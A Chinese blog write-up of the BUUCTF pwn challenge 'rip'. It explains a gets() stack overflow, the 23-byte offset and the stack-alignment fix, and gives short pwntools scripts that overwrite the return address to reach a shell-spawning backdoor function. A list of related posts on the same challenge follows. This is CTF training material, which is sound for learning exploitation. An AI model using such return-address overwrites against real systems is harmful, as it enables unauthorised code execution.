【BUUCTF】rip

已于 2022-08-12 23:08:26 修改
阅读量3.2k 收藏 7
点赞数 1
分类专栏: pwn 文章标签: buuctf pwn
于 2020-12-08 11:03:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013648063/article/details/110858752
版权

这道题本质上很简单,但是在实际操作过程中会遇到一个不对齐的坑。
可参考链接解决:http://blog.eonew.cn/archives/958

这题和蒸米ROP的level3有点像。
检查安全机制。
在这里插入图片描述
用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23
在这里插入图片描述
此外还发现一个fun函数可以直接跳转到这里来获取shell。
在这里插入图片描述
在这里插入图片描述
正常exp如下:

from pwn import *
p = process("./pwn1")
#p = remote("node3.buuoj.cn",29399)

payload = "a" * 23 +p64(0x401186)
p.sendline(payload)
p.interactive()

然而,crash了。

在这里插入图片描述
后面发现BUUCTF的FAQ有提到这个问题。
在这里插入图片描述
参考链接解决:https://www.cnblogs.com/Rookle/p/12871878.html
新的exp如下:

from pwn import *
p = process("./pwn1")
#context.log_level = "debug"
p = remote("node3.buuoj.cn",29157)

payload = "a" * (0xf+8)+p64(0x401187)

p.sendline(payload)
p.interactive()

最后获取到flag。
在这里插入图片描述

破落之实
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1467
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
RIP协议编程
12-29
RIP协议编程 ,里面有路由表的转发,是基于距离向量算法的,挺不错的
PWN学习记录(2)BUUCTF-rip
m0_58824086的博客
07-31 228
gets函数的缓冲区是由用户本身提供,由于用户无法指定一次最多可读入多少字节,导致此函数存在巨大安全隐患。换句话来说,就是gets若没有遇到\n 结束,则会无限读取,没有上限。由**char s[15]**可得,在main函数的栈帧中,划分了一个15字节的存储空间,也就是说只需要存入15个字节地址,就可以get函数返回地址。可以发现,这是一个64位的ELF文件,可得每个存储单元是8个字节,即一个字节是8位,同理32位就是4个字节。dup():重复定义圆括号中指定的初值,次数由前面的数值决定。
rip-BUUCTF(栈溢出)
yuqie的博客
06-14 325
使用ida反汇编程序,发现是一个栈溢出类型,从函数中可以看出给了一个s数组,但没有对输入的长度作限制,因为是一个典型的栈溢出漏洞。然后从main函数之下的fun函数里可以看见一个后门。顺便记录一下后门地址为0x0000000000401186.先使用命令checksec 查看程序保护情况。 发现并没有canary保护。使用gdb结合pwndbg调试进程,计算我们覆盖到返回地址所需字节。使用快捷命令b在main函数处下断点,并使用r(run)运行。 使用命令 n 按行运行,找到输入点,并随便输入几个字
pwn | BUUCTF rip 1&& pwn基本思路
最新发布
Mintind的博客
04-26 887
(写得好详细我好爱(为什么payload有两种写法于。
BUUCTFPwnrip 解题步骤
2301_81505831的博客
01-25 692
查看之后发现是64位的ELF文件,直接放入IDA64进行反编译。
BUUCTF刷题之路-rip1
qq_30528603的博客
05-25 1105
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出题目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
ctf.rip:CTF.RIP Jekyll静态网站
04-04
ctf.rip-来自捕获赃物的CTF编写 此存储库包含ctf.rip网站的Jekyll源,该源通过构建Jekyll站点,然后将生成的_site/路径部署到_site/进行部署。 生产网址: : 要添加帖子: 将新的markdown文件添加到_posts/ 用jekyll build 部署: 切换到_site/文件夹 使用netlify deploy进行netlify deploy 网站信息: 主题: 主持人: 作者: 克里斯·亨特( )
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4749
BUU CTF PWN 入门知识详解
pwn学习(3)BUUCTF-rip(函数知识/缓冲区溢出)
m0_66039322的博客
09-21 530
1.函数调用栈是指程序运行时内存一段连续的区域。(特殊的内存)2.用来保存函数运行时的状态信息,包括函数参数与局部变量等。3.称之为‘栈’是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。4.在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态5.函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。
BUUCTF-rip
m0_64180167的博客
04-11 639
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
[buuctf] rip
zn106414的博客
03-31 657
64位,源程序几乎没有开启任何保护 用ida打开 存在危险函数gets,没有限制输入,存在栈溢出漏洞 还有一个func函数执行了/bin/sh命令 双击s来到Stack of main视图,发现只需存入15个字节即可劫持函数返回地址 因为是64位程序,还需要加8字节的返回地址,因此偏移量为23 或者这里也可以使用pwntools计算一下: pattern create 200 pattern offset A(AADAA; 也可以...
RIP作业1111111
04-22
RIP作业1111111
浅析rip协议
02-20
RIP协议是一种在网关与主机之间交换路由选择信息的标准,本ppt对其进行了简要介绍
rip笔记及RIP配置实例
11-10
rip基本原理 RIP路由器的形成 RIP的更新与维护 触发更新 RIP-2的增强特性 水平分割和毒性反转 多进程和多实例 RIP与BFD联动
4RIP .pka
04-03
4RIP 4RIP .pka
RIP协议解析.docx
10-13
RIP协议解析.docx
[BUUCTF]PWN2——rip
mcmuyanga的博客
08-23 1663
[BUUCTF]-rip 题目网址:https://buuoj.cn/challenges#rip 步骤: 例行检查附件,64位程序,没有开启任何保护 nc一下,看看输入点的提示字符串,让我们写入一个字符串,然后回显ok,bye 用对应位数的ida打开,shift+f12先来查看一下程序里有的字符串 这里可以看到有bin/sh还有system函数,对于这两个我们比较敏感,因为system(/bin/sh)这句代码能让我们直接获取shell 双击bin/sh跟进,然后安装ctrl+x查看一下哪里调用了这
BUUCTF -rip
weixin_56301399的博客
07-20 373
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

破落之实

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值